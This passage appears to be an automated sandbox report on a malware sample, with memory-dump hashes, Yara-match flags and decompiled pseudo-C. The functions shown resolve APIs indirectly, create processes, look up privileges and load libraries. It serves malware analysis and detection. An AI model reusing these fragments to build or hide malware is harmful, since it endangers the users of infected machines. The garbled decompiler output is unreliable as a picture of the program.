                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction ID: 05ac91611fc184a3f88202f4b9a2f722369f22817df951cee1fa85cf63676e78
                                                      • Opcode Fuzzy Hash: 8dbcbf5a4d7b7f1c08d6b628364f414bd548082eea0b37b51084cc01ff771fa2
                                                      • Instruction Fuzzy Hash: A2B01272605540C7F30ADB04D915B467251FBC0F00F408934E50746590D77D9E38D587
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                                      • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                                      • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                                      • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                                      • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                                      • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                      • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                      • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                      • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                      • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                      • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                      • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      • Associated: 00000006.00000002.505684859.0000000000A50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506053222.0000000000B40000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506065389.0000000000B50000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506131260.0000000000B54000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506142816.0000000000B57000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506158210.0000000000B60000.00000040.00000001.sdmp
                                                      • Associated: 00000006.00000002.506420195.0000000000BC0000.00000040.00000001.sdmp
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                      • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                      • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                      • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                      • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                      • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                      • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                      • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                      • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                      • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                      • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                      • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.505706548.0000000000A60000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                      • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                      • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                      • Instruction ID: 290ea537485be02d779a264d5a339eceb4dab98af215cfaa17b5abd8430697b8
                                                      • Opcode Fuzzy Hash: 9835c872434805b420af9e009800db09fa022f69ef5fa6a2d6e4e63ee433b124
                                                      • Instruction Fuzzy Hash: FD213AB2D442095BCB21D664AD42BFF73BCAB54314F04007FE949A3182F638BF498BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A620(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                                      				void* _t10;
                                                      				intOrPtr _t11;
                                                      				void* _t15;
                                                      
                                                      				_t7 = _a4;
                                                      				_t11 =  *((intOrPtr*)(_a4 + 0x10));
                                                      				E0041AF50(_t15, _t7, _t7 + 0xc70, _t11, 0, 0x34);
                                                      				_t6 =  &_a8; // 0x414526
                                                      				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &EA
                                                      • API String ID: 1279760036-1330915590
                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction ID: 51260f1f489a67c7b9949974b81657d9e18ee3442a924465d5a53260c52aa3af
                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                      • Instruction Fuzzy Hash: AFE012B1200208ABDB14EF99CC41EA777ACAF88664F118559BA1C5B242C630F9118AB4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 50%
                                                      			E0041A5AA(intOrPtr _a4, intOrPtr _a8, char _a12, long _a16, long _a20) {
                                                      				void* _t12;
                                                      				void* _t15;
                                                      				void* _t20;
                                                      				void* _t21;
                                                      				void* _t29;
                                                      				void* _t30;
                                                      				intOrPtr* _t33;
                                                      				void* _t35;
                                                      				signed int _t39;
                                                      
                                                      				if(_t39 * 0x10 != 0) {
                                                      					_push(_t30);
                                                      					E0041AF50(_t29, _t12, _t12 + 0xc70, _t21, 0, 0x34);
                                                      					_t11 =  &_a12; // 0x414526
                                                      					_t15 = RtlAllocateHeap( *_t11, _a16, _a20); // executed
                                                      					return _t15;
                                                      				} else {
                                                      					asm("invalid");
                                                      					_t16 = _a4;
                                                      					_t2 = _t16 + 0x10; // 0xffeeffee
                                                      					_t3 = _t16 + 0xc68; // 0x10c68
                                                      					_t33 = _t3;
                                                      					E0041AF50(_t29, _a4, _t33,  *_t2, 0, 0x32);
                                                      					_t20 =  *((intOrPtr*)( *_t33))(_a8, _a12, _a16, _a20, _t30, _t35); // executed
                                                      					return _t20;
                                                      				}
                                                      			}

                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(&EA,?,00414C9F,00414C9F,?,00414526,?,?,?,?,?,00000000,00409CE3,?), ref: 0041A64D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID: &EA
                                                      • API String ID: 1279760036-1330915590
                                                      • Opcode ID: 8a52fe31c40a34a916130df937ca96f10d009718dddc752f356828dfef02f5f0
                                                      • Instruction ID: ac391626b21bb15c078e3a0a36c486e54829ed1ae3c937e6c53b3867179d8e16
                                                      • Opcode Fuzzy Hash: 8a52fe31c40a34a916130df937ca96f10d009718dddc752f356828dfef02f5f0
                                                      • Instruction Fuzzy Hash: 20E08CB16011046BEB20EF558C02EE7375CEF84368F10454AFD1C6B241C130E8258AF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 16%
                                                      			E0040ACD4(void* __eax) {
                                                      
                                                      				asm("repe mov dl, 0x9d");
                                                      				asm("loopne 0xffffff8c");
                                                      				if (__eax + 0xb275f536 >= 0) goto L7;
                                                      			}

                                                      APIs
                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Load
                                                      • String ID:
                                                      • API String ID: 2234796835-0
                                                      • Opcode ID: 40234a8a2d02a7016ed6b1dfa9fb50a2b1cdff91f9250db784d8a5f894bd2bd5
                                                      • Instruction ID: 5bd14da9ace7145ebf6ea5a77f12ca53bc4090f51078a18f40ab6c25d6b1d2b0
                                                      • Opcode Fuzzy Hash: 40234a8a2d02a7016ed6b1dfa9fb50a2b1cdff91f9250db784d8a5f894bd2bd5
                                                      • Instruction Fuzzy Hash: DB218A3590C24A5BEF20DF54D888EF9B761DF11308F0541ABEC48AB382F5379928C796
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                                      				char _v67;
                                                      				char _v68;
                                                      				void* _t12;
                                                      				intOrPtr* _t13;
                                                      				int _t14;
                                                      				long _t21;
                                                      				intOrPtr* _t25;
                                                      				void* _t26;
                                                      				void* _t30;
                                                      
                                                      				_t30 = __eflags;
                                                      				_v68 = 0;
                                                      				E0041BE50( &_v67, 0, 0x3f);
                                                      				E0041C9F0( &_v68, 3);
                                                      				_t12 = E0040ACE0(_t30, _a4 + 0x1c,  &_v68); // executed
                                                      				_t13 = E00414E40(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                      				_t25 = _t13;
                                                      				if(_t25 != 0) {
                                                      					_t21 = _a8;
                                                      					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                      					_t32 = _t14;
                                                      					if(_t14 == 0) {
                                                      						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A470(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                      					}
                                                      					return _t14;
                                                      				}
                                                      				return _t13;
                                                      			}

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                      • Instruction ID: d17f8cfce065c66642409dfa920775f821b8147089a61b374e72855f6ed3688e
                                                      • Opcode Fuzzy Hash: b0fcd880289c8ecfbeb793961d9b547f85606b63ac5ed8a73f76917213b02706
                                                      • Instruction Fuzzy Hash: E0018471A8032877E720A6959C43FFE776C6B40F54F05412AFF04BA1C2E6A8690546EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E0041A6CD(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                      				void* _t23;
                                                      				void* _t34;
                                                      				void* _t35;
                                                      				intOrPtr* _t36;
                                                      				void* _t38;
                                                      
                                                      				_t17 = _a4;
                                                      				_t2 = _t17 + 0xa14; // 0xfffde485
                                                      				_t3 = _t17 + 0xc80; // 0x4099a9
                                                      				_t36 = _t3;
                                                      				E0041AF50(_t34, _a4, _t36,  *_t2, 0, 0x37);
                                                      				_t23 =  *((intOrPtr*)( *_t36))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52, _t35, _t38); // executed
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A724
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E0041A6D0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52) {
                                                      				void* _t22;
                                                      				void* _t33;
                                                      				intOrPtr* _t34;
                                                      
                                                      				_t16 = _a4;
                                                      				_t2 = _t16 + 0xa14; // 0xfffde485
                                                      				_t3 = _t16 + 0xc80; // 0x4099a9
                                                      				_t34 = _t3;
                                                      				E0041AF50(_t33, _a4, _t34,  *_t2, 0, 0x37);
                                                      				_t22 =  *((intOrPtr*)( *_t34))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48, _a52); // executed
                                                      				return _t22;
                                                      			}







                                                      APIs
                                                      • CreateProcessInternalW.KERNEL32(00408CBD,00408CE5,00408A7D,00000010,00408CE5,00000044,?,?,?,00000044,00408CE5,00000010,00408A7D,00408CE5,00408CBD,00408D29), ref: 0041A724
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateInternalProcess
                                                      • String ID:
                                                      • API String ID: 2186235152-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A7B4(void* __eax, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                      				int _t12;
                                                      				void* _t18;
                                                      
                                                      				 *[es:esi+0x4cc6264c] = __eax + 0x30;
                                                      				_t9 = _a4;
                                                      				E0041AF50(_t18, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t9 + 0xa18)), 0, 0x46);
                                                      				_t12 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                      				return _t12;
                                                      			}






                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A660(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                      				char _t10;
                                                      				void* _t15;
                                                      
                                                      				_t3 = _a4 + 0xc74; // 0xc74
                                                      				E0041AF50(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                      				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}






                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CE3,?,?,00409CE3,00000060,00000000,00000000,?,?,00409CE3,?,00000000), ref: 0041A68D
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A7C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                      				int _t10;
                                                      				void* _t15;
                                                      
                                                      				E0041AF50(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                      				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                      				return _t10;
                                                      			}






                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1C2,0040F1C2,0000003C,00000000,?,00409D55), ref: 0041A7F0
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 100%
                                                      			E0041A6A0(intOrPtr _a4, int _a8) {
                                                      				void* _t10;
                                                      
                                                      				_t5 = _a4;
                                                      				E0041AF50(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                      				ExitProcess(_a8);
                                                      			}





                                                      APIs
                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E0041A692(int _a4) {
                                                      				intOrPtr _v0;
                                                      				void* _t8;
                                                      				void* _t12;
                                                      				void* _t16;
                                                      
                                                      				_push(0xffffff8c);
                                                      				 *((intOrPtr*)(_t12 + 0x55092926)) =  *((intOrPtr*)(_t12 + 0x55092926)) + _t8;
                                                      				_t9 = _v0;
                                                      				E0041AF50(_t16, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
                                                      				ExitProcess(_a4);
                                                      			}








                                                      APIs
                                                      • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 0041A6C8
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.504577711.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      C-Code - Quality: 77%
                                                      			E00417DBA(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, char _a4) {
                                                      				signed char _v5;
                                                      				short _v7;
                                                      				char _v8;
                                                      				char _v12;
                                                      				signed char _v13;
                                                      				short _v15;
                                                      				intOrPtr _v19;
                                                      				char _v20;
                                                      				signed int* _v24;
                                                      				signed int _v28;
                                                      				char _v91;
                                                      				char _v92;
                                                      				char _v155;
                                                      				signed char _v156;
                                                      				char _v260;
                                                      				char _v778;
                                                      				char _v780;
                                                      				void* __edi;
                                                      				signed int __esi;
                                                      				void* __ebp;
                                                      				signed int _t135;
                                                      				void* _t146;
                                                      
                                                      				if(__ecx - 1 >= 0) {
                                                      					asm("rcr ecx, 1");
                                                      					_t146 = __eax - 0x9c;
                                                      					 *0xbb781313 = __eax;
                                                      					asm("std");
                                                      					do {
                                                      						asm("sti");
                                                      					} while (_t146 > 0);
                                                      					asm("in eax, 0x69");
